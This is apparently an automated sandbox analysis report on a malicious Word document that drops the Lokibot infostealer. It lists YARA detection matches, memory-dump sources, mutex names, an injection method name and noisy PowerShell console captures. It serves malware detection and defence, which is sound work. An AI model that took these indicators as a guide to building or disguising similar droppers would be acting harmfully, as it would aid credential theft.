                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, hxLwNxnckfXAmWXICd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.sharon38892.exe.4c0000.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 14.2.XxENUzWteJXT.exe.23c57ec.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 14.2.XxENUzWteJXT.exe.21de0e8.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 5.2.sharon38892.exe.215e0d4.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 14.2.XxENUzWteJXT.exe.21ce0dc.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 5.2.sharon38892.exe.216e0e0.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 5.2.sharon38892.exe.23557d8.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@24/25@100/5
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,21_2_0040434D
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$B REmittance Advice.docJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMutant created: \Sessions\1\BaseNamedObjects\ikhgbYgue
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR666F.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......,.......H%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......,.......T%.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......,.......h%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......,.......u%.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......@.......H.......$........%.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.$........%.........................s............H....... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........%.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......&.........................s............H.......$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........&.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$.......#&.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$......./&.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$.......M&.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$......._&.........................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$.......k&.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....@.......H.......$.......}&.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H.......$........&.........................s............H...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P.............................O'.........................s..............".............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................['.........................s..............................".............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P.............................m'.........................s..............".............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................y'.........................s..............................".............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P..............................'.........................s..............".............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'.........................s..............................".............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................'.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........(.........................s.................... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................(.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P.............................+(.........................s..............".............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................7(.........................s..............................".............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....I(.........................s....................$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................U(.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P.............................g(.........................s..............".............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................s(.........................s..............................".............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................(.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P..............................(.........................s..............".....l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................(.........................s..............................".............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................(.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................(.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................8.......(.P.............................6 ......................................................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................B.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........C.........................s.................... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................'C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................;C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................IC.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....{C.........................s....................$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................D.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................D.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............)E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............7E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............JE.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............YE.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......0.......H...............nE.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............|E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........E.........................s.................... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......E.........................s....................$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................E.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H................F.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............*F.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............>F.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............MF.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....0.......H...............`F.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......H...............lF.........................s............................................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ............................?......................................................................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..).............................E.R.R.O.(.P..............................?........................................).....j.......x...............
